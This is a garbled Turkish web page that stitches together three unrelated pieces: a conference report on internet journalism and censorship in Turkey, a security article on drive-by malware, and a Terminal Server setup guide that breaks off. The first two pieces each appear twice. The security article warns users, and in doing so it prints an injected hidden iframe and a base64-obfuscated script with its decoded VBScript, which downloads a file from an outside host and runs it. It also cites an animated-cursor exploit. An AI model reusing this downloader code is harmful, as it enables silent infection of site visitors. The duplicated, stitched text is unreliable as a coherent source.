İnternete Fişi Çekilen Buzdolabı Gibi Davranılıyor
Cuma günü İstanbul’da gerçekleştirilen İnternet Medya’sı konferansının en tuhaf yönü, toplantıda sadece internet üzerinden yayın yapan ve hayatını bu şekilde idame ettiren internet yayıncılarına yer verilmeyişiydi. Başkanlığını gerçek bir internet yayıncısı olan Hadi Özışık'ın yürüttüğü İnternet Medya Derneği, internet yayıncılığı alanındaki toplantıyı internet yayıncılığının başta reklam, sonra internet gazetecilerinin statüsü, hukuki altyapı, telif hakları gibi çeşitli sorunlarının tartışılacağı bir ortam haline getirmek yerine Ulaştırma Bakanı, 4 büyük Cep Telefonu Operatörü firmanın Genel Müdürleri ve Sabah, Hürriyet, Zaman portallerinin yöneticilerinin konuşma yaptıkları bir gövde gösterisi haline getirmeyi tercih etmişti.
Bu da son dönemde "AKP internet yayıncılığını da ipotek altına almaya çalışıyor, sansür için uğraşıyor" yorumlarını arttırdı.
Nitekim, Ulaştırma Bakanı Binali Yıldırım, toplantının açılış konuşmasında bu hafta TBMM Adalet Komisyonu’nda kabul edilen internet yayıncılığına sansür getirmeye yönelik yasa tasarısı hakkında uzun uzun açıklamalar yaptı. Bakan Yıldırım'ın konuşmasının bir özetini burayı tıklayarak okuyabilirsiniz.
Bakanın konuşmasını takip eden panelde 4 telekom devinin Genel Müdürleri teknoloji konusundaki görüşlerini aktardılar. (Bkz : Ciliv : Turkcell Artık Yalnızca GSM Operatörü değil)
Ancak konferansın en ilginç paneli öğleden sonra sunulan ve Hürriyet Gazetesi’nin portalini yöneten Fatih Çekirge, Zaman Gazetesi Genel Müdürü Ekrem Dumanlı, Sabah Gazetesi Portal sorumlusu Bülent Denli, İnternethaber.com’dan Nazım Alpman, Radikal Gazetesinin internet yayınlarından sorumlu Serdar Kuzuloğlu ve hukukçu Adem Sözüer'in katıldığı ve "İnternet ve Medya" başlıklı panel oldu.
Bu panelde internet yayıncısı yani internet yayını üzerinden kazanılan para ile ayakta duran ve haberlerini kendi başına oluşturan sadece İnternethaber.com vardı.
Panel yöneticisi Mehmet Barlas’ın uçağına yetişmesi gerektiği için, bir süre sonra yerine geçmekle birlikte panel yöneticisi olmam nedeniyle ben bir konuşma yapmadım, sadece bir kaç noktayı düzeltmeye çalıştım. Çünkü klasik gazeteciler örneğin internet yayıncılarının kalitesinden ya da internetin tehlikeli olduğundan şikayet ediyorlardı.
Buna cevabı salonda da vermeye çalıştım ama burada kısaca not edeyim ; gazetecilerin son 10-15 yılda kendi aralarında yaptıkları “gazetecilik kalitesi” tartışmalarını ya da bugün gazete ve TV'larda gördüklerimizi hatırlatmak istiyorum. Ülkemizde basılı gazeteciler ne kadar kaliteli ise, internet yayıncıları da o kadar kaliteli. Çünkü her ikisi de ülkemizin insan kaynağı.
İnternette yanlış bilgilerin basılabileceği ve bu nedenle tehlikeli olduğu ifadesine ise cevabı Serdar Kuzuloğlu zaten verdi. Kuzuloğlu internetin popüler ansiklopedisi Wikipedia’da yapılan bir denemeyi anlattı. Bilerek yanlış yazılan bir ifadenin 8,5 dakika içinde bir okuyucu tarafından ikaz edildiğini söyleyen Kuzuloğlu’nun ifadesi, bir kere yanlış bilgiyle basılmış gazetenin düzeltilme olanağı olmadığını düşünürsek, bu bir tehlike ise ancak gazeteler için düşünülebilir dedirtiyor.
İnternetin akşam TV haberleri ile sabah gazetesi arasında yer aldığı ve internet haberciliğinin her an ulaşılabilir olduğuna vurgu yapılan panelde konuşmacıların ifadeleri şu şekildeydi :
Fatih Çekirge; İnternette İnanılmaz Olanaklar Var
Hürriyet Gazetesinin portalini yöneten Çekirge portalde yaptığı değişiklikleri ve özellikle Foto Analiz bölümün anlattı ve şöyle dedi ;
Kağıttan gelen birisiyim. Şimdi bakıyorum gazetelerde yapmaya çalıştığımız yeniliklerde aslında bugünün internetinin sağladığı olanakları aramışız. İnanılmaz bir olanaklar yelpazesi var internette. Gazete ve televizyonun yapamadığı herşeyi yapıyor gazete interneti. Bana göre gazete internetinin karşısında gazetenin hiçbir şansı yok. Televizyon ve gazete arasında en avantajlısı internet.
Çekirge geleceğin bu yönde olduğunu belirtirken sözlerinin sonunda gazete yayıncılığında aradığının interaktivite olduğunu ve bunu şimdi bulduğunu söyledi.
Kuzuloğlu : İnternet Ortamında Okunurluk Çok Daha Fazla
İnternet gazeteciliğinin de öncülerinden olarak bilinen Radikal yazarı Serdar Kuzuloğlu renkli konuşmasında, internet yayınlarının, basılı gazetelere kıyasla inanılmaz sayılarda okunma oranlarına ulaştığını söylerken, Radikal gazetesinde bu oranın 6-7 kata vardığına işaret etti.
Kuzuloğlu normal okurlar dışında en büyük trafiği % 40 ile Google'dan aldıklarını ve "arama değil takip motoru" olarak tanımladığı Google üzerinde yer almayanların internette şansı olmadığını belirtirken :
Türkiye'deki internet medyasını işsiz kalan gazeteciler yarattı. İnternethaber ve Habertürk böyle ortaya çıktı. Bu noktadan bakınca "iyi ki işsiz kalmışlar" diyor insan.
şeklinde yorum yaptı ve İnternette en çok ziyaret edilen yerlerin eğlence siteleri olduğunu söyledi. Kuzuloğlu vatandaş gazeteciliğinin de yükseldiğine dikkati çekti.
İnternetteki İlk Türk Gazetesi Zaman Oldu
Zaman Gazetesi'nin Genel Yayın Yönetmeni Ekrem Dumanlı, kendisinin internetle çok ilgili olmadığını ama Zaman Gazetesi'nin internette yayınlanan ilk gazete olduğunu söyledi. Dumanlı interneti çok övenler olduğu gibi, çok şikayet edenler de olduğunu belirtti :
Çok önemli bir bilgi kaynağı ama dikkatle ele alınmazsa bilgi çöplüğü haline gelebilir. İnternet bilgilendirme ve eğlence amaçlı. Zaman içinde markalaşma olacak. Bazı siteler ve bazı kaynaklar itibar kazanacak. Bu biraz yapılacak habercilik ve sorumluluk duygusuna bağlı.
dedi. Dumanlı, İnternet'in gazeteleri bitirmeyeceğini, bazı ara formüllerin çıkacağını düşündüğünü söyledi.
Denli : İnternette İnsan Kapasitesi Henüz yeterli Değil
Sabah Gazetesi portalinin yöneticisi Bülent Denli, "kağıdı eline almadan gazetecilik yapma şaşkınlığını yaşadık" şeklinde tanımladığı internet yayıncılığı konusunda sorumluluğun daha büyük olduğunu çünkü internetin daha geniş bir alana yayıldığını düşünüyor. Gazetelerde basılan yanlış haberlerin arşivlerde ve o da birkaç noktada kalacağını ama internetteki yanlışlıkların çok daha geniş yayılacağını belirterek, yeterli insan kaynağı olmadığını ve kalite gerektiğini belirtiyor.
Alpman : İnternet Motoru Durdurulan Araba Gibi Mi dolduruluyor? Üstten mi İlave ediliyor?
İnternethaber.com yazarı Nazım Alpman, bilgisayar kullanmaya en geç başlayan gazetecilerden birisi olduğunu ve internet yayıncılığının başta nasıl çalıştığını anlamadığı için, sabah hazırlanan haberlerinin ancak öğleden sonra konulduğunu anlattı. Alpman sonuçta bunu "bu iş nasıl yapılıyor. Arabanın motorunu durdurup sonra içine koyup çalıştırmak gibi mi? Yoksa üstten ilave etmek gibi mi?" sorusu ile öğrendiğini ve artık haberlerin kendisi neredeyse oradan doğrudan sayfaya yazılabildiğini anlattı.
Sözüer : İnternete Fişi Çekilecek Buzdolabı Gibi davranılıyor
İnternetin hukuki yönlerine panelin tek hukukçusu Adem Sözüer cevap verdi. Sözüer öncelikle İnternet gazetecilerinin statüsü konusunda yorumlar yaptı. Konferans başında açılış konuşması yapan Ulaştırma Bakanı kısaca internet gazetecilerinin statüsünü belirlemek istediklerini ama çıkan kanunun içine ekleyemediklerini belirtmişti. Sözüer aksine kanunun içine bunun eklenmesinde bir sakınca olmadığını düşünüyor.
Sözüer bu tanımın yapılmasının internet yayıncılarına hem hak hem de yükümlülük getireceğini hatırlattı.
Özüer kadın örgütlerinin medeni kanun çalışmalarında yaptıkları lobiciliğin çok fayda sağladığını hatırlatarak internet yayıncılarının da benzer bir hareket yapması gerektiğini, Devlet Bakanı Beşir Atalay'a öneri verilmesini önerdiğini söyledi ve site kapatmalarını, işe yaramayan buzdolabının fişinin çekilmesine benzetti.
GİZLİ TEHLİKE
Geçtiğimiz birkaç hafta içinde çeşitli Web sitelerinde kullanıcılara yönelik zararlı programların barındırıldığı haberleri artmaya başladı. Bu tür içeriklere sahip Web siteleri incelendiğinde ilginç sonuçlarla karşılaşılmaktadır. Bir çok Internet sitesinin ana sayfalarında yapılan küçük bir değişiklikle, kullanıcılar bu adreslere giriş yaptıklarında bilgisayarlarına zararlı programcıklar yerleşmektedir. Böylece kullanıcıların sistemleri uzaktan kontrol edilebilir duruma geçmiştir. Ayrıca bu tür zararlı programlar vasıtasıyla kullanıcıların özel bilgileri kontrol altına alınmaktadır. Web sayfalarında meydana getirilen bu değişiklikler gizli bir şekilde yapılmıştır. Çeşitli uygulamalara ait zaaflarının ortaya çıkması demek bilgisayar kullanıcılarının kişisel bilgilerine ulaşmada bir adım daha yaklaşmak demektir. Kişisel bilgilerin ele geçirilmesinde, internet kullanıcıların güven duygusuyla bağlandığı Web sitelerinin de rol aldığını görmekteyiz.
Tehlikeli bir oyunun içerisinde rol alan bu sitelerin çoğu bu tür içeriklere sahip olduğu konusunda habersizdir. Dışarıdan bakıldığında Web sitesi olağan gözükür. Fakat arka planda farklı bir siteye yönlendirerek ve sistem zaafından yararlanarak kullanıcın bilgisayarına zararlı program yerleşmiş olur.
Saldırganın, WWW Sunucusuna erişerek .htm/.php/.asp tipi içeriklerde değişiklik yaparak siteyi ziyaret edenleri başka bir adrese yönlendirmeyi sağlar. Örnek yönlendirme: [iframe src=http://tehlikeli.adres/helptop.do?id=ad003 width=100 height=0] .
İnternet kullanıcısı internet adresine bağlanarak sayfalar arasında gezinmeye başlar. Fakat bu esnada WEB sunucuna yerleştirilen kod parçasıyla başka bir adrese yönlendirilir. Kullanıcının sisteminde bir zaaf mevcutsa zararlı program kullanıcının bilgisayarına yerleşir.
Tüm bu işlemler kullanıcıdan habersiz gerçekleşir.
Kullanıcının sistemine yerleşen program, kişisel bilgileri saldırgana gönderir ya da sistemi dışarıdan müdahaleye olanak sağlayacak durumu getirir.
Bu türdeki son örneği bir donanım üreticisinin ana Web sayfasında karşılaştık. Kullanıcılar bu donanım üreticisinin ana sayfasına bağlandıklarında başka bir sayfaya yönlendirilerek zararlı kod sisteme kopyalanıyordu. Ana sayfaya şu şekilde bir eklenti yapılmıştı:
...
{/tr}
{/table}
{iframe src=http://www.ipqwe.com/app/helptop.do?id=ad003 width=100 height=0}
{/iframe}
{/td}
…
Kullanıcı yönlendirildiği sayfanın içeriği:
{SCRIPT LANGUAGE="JavaScript" src="./top/top.js"}{/script}{SCRIPT LANGUAGE="JavaScript"}
var g = "ODNBLTAwQzA0RkMyOUUzNiINCiAgICBYTUwxID0gIk1pYyINCiAgICBYTUwyID0gInJvc2 9md
C5YTUxIVFRQIg0KICAgIEFkb1NxYTEgPSAiQWRvZGIuUyINCi
AgICBBZG9TcWEyID0gInRyZWFtIg0KICAgIG9HZXQgICA9ICJHRVQiDQogICAgZm5hbWUxI
D0gIlRyYWR1ZS5jb20iDQogICAgU0ZPICAgID0gIlNjcmlwdGluZy5
GaWxlU3lzdGVtT2JqZWN0Ig0KI….
….
….
"; document.write(aa(g,122));{/SCRIPT}
Base64 şeklinden normal dönüşüm yapıldığında kodu şu şekilde görürüz:
….
XML2 = "rosoft.XMLHTTP"
AdoSqa1 = "Adodb.S"
AdoSqa2 = "tream"
oGet = "GET"
fname1 = "Tradue.com"
SFO = "Scripting.FileSystemObject"
SApp = "Shell.Application"
dl = "http://www.ok8vs.com/app/ppapp/next3.png"
Set df = document.createElement("object")
df.setAttribute "classid", clID1&clID2
Set x = df.CreateObject(XML1&XML2,"")
set S = df.createobject(AdoSqa1&AdoSqa2,"")
if Not Err.Number = 0 then
err.clear
document.write ("{iframe src=cc.do?id=ad003 width=100 height=0}")
else
S.type = 1
x.Open oGet, dl, False
x.Send
set F = df.createobject(SFO,"")
...
Kullanıcıdan habersiz next3.png isimli dosya sisteme indirilerek tradue.com şeklinde çalıştırılır. Ayrıca kullanıcının sisteminde güncel bir açık(.ani exploit) varsa program otomatik olarak başka bir site üzerinden sisteme kurulacaktır.
{html}
{body}
{DIV style="CURSOR: url('./bmw3.pig')"}
{/DIV}
{/body}
{/html}
Hex / bmw3.pig/
Yukarıda bmw3.pig isimli dosyanın içeriği gözükmektedir. Bu “Animated Cursor” tipi dosyalarına özgü olan bir açıktan faydalanarak sisteme zararlı program yüklemeye çalışan bir dosyadır.
Web sayfalarını gezerken ansızın açılan pencereler, sistem kilitlenmeleri kötü bir haberin başlangıcı olabilir. Yeni bir güvenlik zaafı ortaya çıktığında bu istismarın tehlike boyutunu arttıracak çeşitli yöntemlerde ortaya çıkmaktadır. Bilinen yöntemleri takip etmek kolay olabilir.
Fakat Antivirus, Firewall gibi yazılımları atlatacak yöntemlerin ortaya çıkması internet kullanıcılarını zor durumda bırakması içten bile değildir.
Adım adım bir zararlı uygulamanın sisteme erişmesini inceleyelim:
* WEB Sayfaları arasındaki gezintiler esnasında istemediğiniz bir bağlantının meydana getirdikleri sisteminizi sizin kontrolü haricinde başka kesimlere de kontrol etme imkanı sağlayabilir. Yukarıdaki resimde görüldüğü gibi bağlantı sağlanan sayfa isteğiniz dışında bazı işlemleri gerçekleştirmeye zemin hazırlar. Burada yer alan resimler sniffer(paket koklayıcı) programı ile elde edilmiştir.
* Arka planda calışan sayfa işletim sistemi kontrolünü gerçekleştirmektedir. Kontrol işlemi sonucu istenilen işletim sistemini kullanıyorsanız tehlikeli bir kapının yanına yaklaştınız demektir.
* Resimde görüldüğü gibi işletim sisteminiz güvenlik zaafı sonucunda uzaktan sisteminize istenilen uygulama aktarılıyor.
* Zararlı program sisteme yüklenmeye başlamıştır. Sniffer ile tespit edilen paket kontrol edildiğinde bunun bir .exe uygulaması olduğu görülür(Başlık: MZP).
Sisteme aktarılan bu uygulama derinlemesine incelendiğinde;
Registry ayarlarında kullanıcının bilgisi dahilinde olmayan değişiklikler yapmaktadır.
* Bir çok zararlı programların temel huyu registry kayıtlarında kendine göre oynama yapmaktır. Böylece sistemin açılışında otomatik aktif olur ve internet Explorer gibi browserlarda kontrolü ele alır.
* Kendini gizlemek çeşitli yöntemler kullanır. Bunun için güvenilir bir imaj sağlamış olan herhangi bir dizine kendisini kopyalar (Örn: C:\Program Files\Microsoft Shared\MSINFO”).
* Zararlı uygulama kendini dizine kopyalamıştır. Fakat görünürde işletim sistemine ait uygulamalardan başka bir uygulama görünmemektedir.
* Bilindik bir komut olan “dir” komutuyla dizini incelediğimizde yine işletim sistemine ait dosyalar görünüyor.
* dir /ah komutuyla gizli dosyaları rahatlıkla görüyoruz. “NewInfo.dll” ve “system.2dt” isimli dosyalar sistemi takip etmek için kullanıcıdan habersiz bir güvenlik zaafından yararlanılarak sisteme yüklenmiştir.
Internet kullanıcılarının kişisel bilgilerini ele geçirmek için kullanıcılar tarafından sıklıkla ziyaret edilen Web sayfaları birer hedef haline dönüşmektedir. Bu kişi/kişiler Web sayfalarında görünür bir değişiklik yapmaktansa gizli kodlar ekleyerek kullanıcıların kişisel bilgilerini ele geçirme yolunu tercih ederler.
İnternete Fişi Çekilen Buzdolabı Gibi Davranılıyor
Cuma günü İstanbul’da gerçekleştirilen İnternet Medya’sı konferansının en tuhaf yönü, toplantıda sadece internet üzerinden yayın yapan ve hayatını bu şekilde idame ettiren internet yayıncılarına yer verilmeyişiydi. Başkanlığını gerçek bir internet yayıncısı olan Hadi Özışık'ın yürüttüğü İnternet Medya Derneği, internet yayıncılığı alanındaki toplantıyı internet yayıncılığının başta reklam, sonra internet gazetecilerinin statüsü, hukuki altyapı, telif hakları gibi çeşitli sorunlarının tartışılacağı bir ortam haline getirmek yerine Ulaştırma Bakanı, 4 büyük Cep Telefonu Operatörü firmanın Genel Müdürleri ve Sabah, Hürriyet, Zaman portallerinin yöneticilerinin konuşma yaptıkları bir gövde gösterisi haline getirmeyi tercih etmişti.
Bu da son dönemde "AKP internet yayıncılığını da ipotek altına almaya çalışıyor, sansür için uğraşıyor" yorumlarını arttırdı.
Nitekim, Ulaştırma Bakanı Binali Yıldırım, toplantının açılış konuşmasında bu hafta TBMM Adalet Komisyonu’nda kabul edilen internet yayıncılığına sansür getirmeye yönelik yasa tasarısı hakkında uzun uzun açıklamalar yaptı. Bakan Yıldırım'ın konuşmasının bir özetini burayı tıklayarak okuyabilirsiniz.
Bakanın konuşmasını takip eden panelde 4 telekom devinin Genel Müdürleri teknoloji konusundaki görüşlerini aktardılar. (Bkz : Ciliv : Turkcell Artık Yalnızca GSM Operatörü değil)
Ancak konferansın en ilginç paneli öğleden sonra sunulan ve Hürriyet Gazetesi’nin portalini yöneten Fatih Çekirge, Zaman Gazetesi Genel Müdürü Ekrem Dumanlı, Sabah Gazetesi Portal sorumlusu Bülent Denli, İnternethaber.com’dan Nazım Alpman, Radikal Gazetesinin internet yayınlarından sorumlu Serdar Kuzuloğlu ve hukukçu Adem Sözüer'in katıldığı ve "İnternet ve Medya" başlıklı panel oldu.
Bu panelde internet yayıncısı yani internet yayını üzerinden kazanılan para ile ayakta duran ve haberlerini kendi başına oluşturan sadece İnternethaber.com vardı.
Panel yöneticisi Mehmet Barlas’ın uçağına yetişmesi gerektiği için, bir süre sonra yerine geçmekle birlikte panel yöneticisi olmam nedeniyle ben bir konuşma yapmadım, sadece bir kaç noktayı düzeltmeye çalıştım. Çünkü klasik gazeteciler örneğin internet yayıncılarının kalitesinden ya da internetin tehlikeli olduğundan şikayet ediyorlardı.
Buna cevabı salonda da vermeye çalıştım ama burada kısaca not edeyim ; gazetecilerin son 10-15 yılda kendi aralarında yaptıkları “gazetecilik kalitesi” tartışmalarını ya da bugün gazete ve TV'larda gördüklerimizi hatırlatmak istiyorum. Ülkemizde basılı gazeteciler ne kadar kaliteli ise, internet yayıncıları da o kadar kaliteli. Çünkü her ikisi de ülkemizin insan kaynağı.
İnternette yanlış bilgilerin basılabileceği ve bu nedenle tehlikeli olduğu ifadesine ise cevabı Serdar Kuzuloğlu zaten verdi. Kuzuloğlu internetin popüler ansiklopedisi Wikipedia’da yapılan bir denemeyi anlattı. Bilerek yanlış yazılan bir ifadenin 8,5 dakika içinde bir okuyucu tarafından ikaz edildiğini söyleyen Kuzuloğlu’nun ifadesi, bir kere yanlış bilgiyle basılmış gazetenin düzeltilme olanağı olmadığını düşünürsek, bu bir tehlike ise ancak gazeteler için düşünülebilir dedirtiyor.
İnternetin akşam TV haberleri ile sabah gazetesi arasında yer aldığı ve internet haberciliğinin her an ulaşılabilir olduğuna vurgu yapılan panelde konuşmacıların ifadeleri şu şekildeydi :
Fatih Çekirge; İnternette İnanılmaz Olanaklar Var
Hürriyet Gazetesinin portalini yöneten Çekirge portalde yaptığı değişiklikleri ve özellikle Foto Analiz bölümün anlattı ve şöyle dedi ;
Kağıttan gelen birisiyim. Şimdi bakıyorum gazetelerde yapmaya çalıştığımız yeniliklerde aslında bugünün internetinin sağladığı olanakları aramışız. İnanılmaz bir olanaklar yelpazesi var internette. Gazete ve televizyonun yapamadığı herşeyi yapıyor gazete interneti. Bana göre gazete internetinin karşısında gazetenin hiçbir şansı yok. Televizyon ve gazete arasında en avantajlısı internet.
Çekirge geleceğin bu yönde olduğunu belirtirken sözlerinin sonunda gazete yayıncılığında aradığının interaktivite olduğunu ve bunu şimdi bulduğunu söyledi.
Kuzuloğlu : İnternet Ortamında Okunurluk Çok Daha Fazla
İnternet gazeteciliğinin de öncülerinden olarak bilinen Radikal yazarı Serdar Kuzuloğlu renkli konuşmasında, internet yayınlarının, basılı gazetelere kıyasla inanılmaz sayılarda okunma oranlarına ulaştığını söylerken, Radikal gazetesinde bu oranın 6-7 kata vardığına işaret etti.
Kuzuloğlu normal okurlar dışında en büyük trafiği % 40 ile Google'dan aldıklarını ve "arama değil takip motoru" olarak tanımladığı Google üzerinde yer almayanların internette şansı olmadığını belirtirken :
Türkiye'deki internet medyasını işsiz kalan gazeteciler yarattı. İnternethaber ve Habertürk böyle ortaya çıktı. Bu noktadan bakınca "iyi ki işsiz kalmışlar" diyor insan.
şeklinde yorum yaptı ve İnternette en çok ziyaret edilen yerlerin eğlence siteleri olduğunu söyledi. Kuzuloğlu vatandaş gazeteciliğinin de yükseldiğine dikkati çekti.
İnternetteki İlk Türk Gazetesi Zaman Oldu
Zaman Gazetesi'nin Genel Yayın Yönetmeni Ekrem Dumanlı, kendisinin internetle çok ilgili olmadığını ama Zaman Gazetesi'nin internette yayınlanan ilk gazete olduğunu söyledi. Dumanlı interneti çok övenler olduğu gibi, çok şikayet edenler de olduğunu belirtti :
Çok önemli bir bilgi kaynağı ama dikkatle ele alınmazsa bilgi çöplüğü haline gelebilir. İnternet bilgilendirme ve eğlence amaçlı. Zaman içinde markalaşma olacak. Bazı siteler ve bazı kaynaklar itibar kazanacak. Bu biraz yapılacak habercilik ve sorumluluk duygusuna bağlı.
dedi. Dumanlı, İnternet'in gazeteleri bitirmeyeceğini, bazı ara formüllerin çıkacağını düşündüğünü söyledi.
Denli : İnternette İnsan Kapasitesi Henüz yeterli Değil
Sabah Gazetesi portalinin yöneticisi Bülent Denli, "kağıdı eline almadan gazetecilik yapma şaşkınlığını yaşadık" şeklinde tanımladığı internet yayıncılığı konusunda sorumluluğun daha büyük olduğunu çünkü internetin daha geniş bir alana yayıldığını düşünüyor. Gazetelerde basılan yanlış haberlerin arşivlerde ve o da birkaç noktada kalacağını ama internetteki yanlışlıkların çok daha geniş yayılacağını belirterek, yeterli insan kaynağı olmadığını ve kalite gerektiğini belirtiyor.
Alpman : İnternet Motoru Durdurulan Araba Gibi Mi dolduruluyor? Üstten mi İlave ediliyor?
İnternethaber.com yazarı Nazım Alpman, bilgisayar kullanmaya en geç başlayan gazetecilerden birisi olduğunu ve internet yayıncılığının başta nasıl çalıştığını anlamadığı için, sabah hazırlanan haberlerinin ancak öğleden sonra konulduğunu anlattı. Alpman sonuçta bunu "bu iş nasıl yapılıyor. Arabanın motorunu durdurup sonra içine koyup çalıştırmak gibi mi? Yoksa üstten ilave etmek gibi mi?" sorusu ile öğrendiğini ve artık haberlerin kendisi neredeyse oradan doğrudan sayfaya yazılabildiğini anlattı.
Sözüer : İnternete Fişi Çekilecek Buzdolabı Gibi davranılıyor
İnternetin hukuki yönlerine panelin tek hukukçusu Adem Sözüer cevap verdi. Sözüer öncelikle İnternet gazetecilerinin statüsü konusunda yorumlar yaptı. Konferans başında açılış konuşması yapan Ulaştırma Bakanı kısaca internet gazetecilerinin statüsünü belirlemek istediklerini ama çıkan kanunun içine ekleyemediklerini belirtmişti. Sözüer aksine kanunun içine bunun eklenmesinde bir sakınca olmadığını düşünüyor.
Sözüer bu tanımın yapılmasının internet yayıncılarına hem hak hem de yükümlülük getireceğini hatırlattı.
Özüer kadın örgütlerinin medeni kanun çalışmalarında yaptıkları lobiciliğin çok fayda sağladığını hatırlatarak internet yayıncılarının da benzer bir hareket yapması gerektiğini, Devlet Bakanı Beşir Atalay'a öneri verilmesini önerdiğini söyledi ve site kapatmalarını, işe yaramayan buzdolabının fişinin çekilmesine benzetti.
GİZLİ TEHLİKE
Geçtiğimiz birkaç hafta içinde çeşitli Web sitelerinde kullanıcılara yönelik zararlı programların barındırıldığı haberleri artmaya başladı. Bu tür içeriklere sahip Web siteleri incelendiğinde ilginç sonuçlarla karşılaşılmaktadır. Bir çok Internet sitesinin ana sayfalarında yapılan küçük bir değişiklikle, kullanıcılar bu adreslere giriş yaptıklarında bilgisayarlarına zararlı programcıklar yerleşmektedir. Böylece kullanıcıların sistemleri uzaktan kontrol edilebilir duruma geçmiştir. Ayrıca bu tür zararlı programlar vasıtasıyla kullanıcıların özel bilgileri kontrol altına alınmaktadır. Web sayfalarında meydana getirilen bu değişiklikler gizli bir şekilde yapılmıştır. Çeşitli uygulamalara ait zaaflarının ortaya çıkması demek bilgisayar kullanıcılarının kişisel bilgilerine ulaşmada bir adım daha yaklaşmak demektir. Kişisel bilgilerin ele geçirilmesinde, internet kullanıcıların güven duygusuyla bağlandığı Web sitelerinin de rol aldığını görmekteyiz.
Tehlikeli bir oyunun içerisinde rol alan bu sitelerin çoğu bu tür içeriklere sahip olduğu konusunda habersizdir. Dışarıdan bakıldığında Web sitesi olağan gözükür. Fakat arka planda farklı bir siteye yönlendirerek ve sistem zaafından yararlanarak kullanıcın bilgisayarına zararlı program yerleşmiş olur.
Saldırganın, WWW Sunucusuna erişerek .htm/.php/.asp tipi içeriklerde değişiklik yaparak siteyi ziyaret edenleri başka bir adrese yönlendirmeyi sağlar. Örnek yönlendirme: [iframe src=http://tehlikeli.adres/helptop.do?id=ad003 width=100 height=0] .
İnternet kullanıcısı internet adresine bağlanarak sayfalar arasında gezinmeye başlar. Fakat bu esnada WEB sunucuna yerleştirilen kod parçasıyla başka bir adrese yönlendirilir. Kullanıcının sisteminde bir zaaf mevcutsa zararlı program kullanıcının bilgisayarına yerleşir.
Tüm bu işlemler kullanıcıdan habersiz gerçekleşir.
Kullanıcının sistemine yerleşen program, kişisel bilgileri saldırgana gönderir ya da sistemi dışarıdan müdahaleye olanak sağlayacak durumu getirir.
Bu türdeki son örneği bir donanım üreticisinin ana Web sayfasında karşılaştık. Kullanıcılar bu donanım üreticisinin ana sayfasına bağlandıklarında başka bir sayfaya yönlendirilerek zararlı kod sisteme kopyalanıyordu. Ana sayfaya şu şekilde bir eklenti yapılmıştı:
...
{/tr}
{/table}
{iframe src=http://www.ipqwe.com/app/helptop.do?id=ad003 width=100 height=0}
{/iframe}
{/td}
…
Kullanıcı yönlendirildiği sayfanın içeriği:
{SCRIPT LANGUAGE="JavaScript" src="./top/top.js"}{/script}{SCRIPT LANGUAGE="JavaScript"}
var g = "ODNBLTAwQzA0RkMyOUUzNiINCiAgICBYTUwxID0gIk1pYyINCiAgICBYTUwyID0gInJvc2 9md
C5YTUxIVFRQIg0KICAgIEFkb1NxYTEgPSAiQWRvZGIuUyINCi
AgICBBZG9TcWEyID0gInRyZWFtIg0KICAgIG9HZXQgICA9ICJHRVQiDQogICAgZm5hbWUxI
D0gIlRyYWR1ZS5jb20iDQogICAgU0ZPICAgID0gIlNjcmlwdGluZy5
GaWxlU3lzdGVtT2JqZWN0Ig0KI….
….
….
"; document.write(aa(g,122));{/SCRIPT}
Base64 şeklinden normal dönüşüm yapıldığında kodu şu şekilde görürüz:
….
XML2 = "rosoft.XMLHTTP"
AdoSqa1 = "Adodb.S"
AdoSqa2 = "tream"
oGet = "GET"
fname1 = "Tradue.com"
SFO = "Scripting.FileSystemObject"
SApp = "Shell.Application"
dl = "http://www.ok8vs.com/app/ppapp/next3.png"
Set df = document.createElement("object")
df.setAttribute "classid", clID1&clID2
Set x = df.CreateObject(XML1&XML2,"")
set S = df.createobject(AdoSqa1&AdoSqa2,"")
if Not Err.Number = 0 then
err.clear
document.write ("{iframe src=cc.do?id=ad003 width=100 height=0}")
else
S.type = 1
x.Open oGet, dl, False
x.Send
set F = df.createobject(SFO,"")
...
Kullanıcıdan habersiz next3.png isimli dosya sisteme indirilerek tradue.com şeklinde çalıştırılır. Ayrıca kullanıcının sisteminde güncel bir açık(.ani exploit) varsa program otomatik olarak başka bir site üzerinden sisteme kurulacaktır.
{html}
{body}
{DIV style="CURSOR: url('./bmw3.pig')"}
{/DIV}
{/body}
{/html}
Terminal Server Kurulum - Yapılandırma
Günümüzde sirket aglarinda sikça kullanilan,clientlarin servera erisimini saglayan bir servistir.Gerek duyulup kurulmasini saglayan bir kaç neden vardir.Bunlar genelde düsük yapilandirmaya sahip clientlarin (düsük Ram ve Cpu) kendi makinalarinda çalistiramadiklari uygulamalari (Excel,Access) kullanma gereklilikleri,merkezi bir veritabanina bagli uygulamalara erisip islem gerçeklestirme veya uzaktan yönetimde kolaylik saglama gerekliligi gibi nedenler sayilabilir.. Bunlarin kisaca açiklarsak; sirket içerisindeki tüm eski bilgisayarlarda genel olarak sik kullanilan word,excel veya database uygulamalarini çalistirmakta zorlaniyorsak ve açildiginda islem yapamayacak kadar agir çalistigindan sikayetçiysek Terminal Server baglantisiyla bu sorundan kurtulabiliriz.Serverin islemci ve bellek destegiyle istedigimiz uygulamayi sanki kendi bilgisayarimizdaymiscasina rahatlikla kullanabilir ve islemlerimizi gerçeklestirebiliriz.Keza merkezi bir veri tabanina bilgi girisi gerekliligindede bu uygulama hayat kurtaran cinstendir.Merkez sirkete bagli subelerin günlük islemlerini kaydetmek için ana bilgisayara baglanarak veri tabanina bilgi girmeleri ve bunu Terminal Server araciligiyla yapmalari hem zaman hemde güvenlik açisindan (veritabaninin merkezde saklanmasi) yararlidir.
Ayni zamanda sunuculara uzaktan erisim içinde kullanilir.Sistem yöneticisi sunucu üzerindeki yapilandirmalari uzak bilgisayardan takip ve koordine ederek hem is yükünün azaltilmasini hemde sürecin islemesindeki aksakliklari nerede olursa olsun kontrol altina alarak bertaraf etmenin avantajlarini kullanir.
2 Sekilde Kullanimi vardir;
a- Remoter Administration Mode :
b- Application Mode :
a) : Varsayilan olarak Server 2003 kurulu oldugunda Remote Admin modulu yüklü gelir ve kullanilabilmesi için lisans servisine basvurmasi gerekmez.Bu modda erisim saglamak için Administrator grubunda olmak gerek.Eger sunucu Domain içerisinde bulunuluyorsa dogal olarak Domain Admins grubuda katilacagindan bu yetkilere sahip kullanicilar uzaktan erisim saglayabilirler.Bununda siniri ayni anda en fazla 2 kullanicidir.Yönetim ve denetleme amaciyla kullanilacagindan cok fazla kullaniciya gerek yoktur.Belirtilen yetkili kullanicilar disinda kullanicilarinda baglanmasi isteniyorsa bunu, bilgisayarima sag tiklayarak özellikleri seçip, “Uzak” basligi altindan “uzak masa üstü kullanicilarini seç” i seçerek yapilandirabiliriz
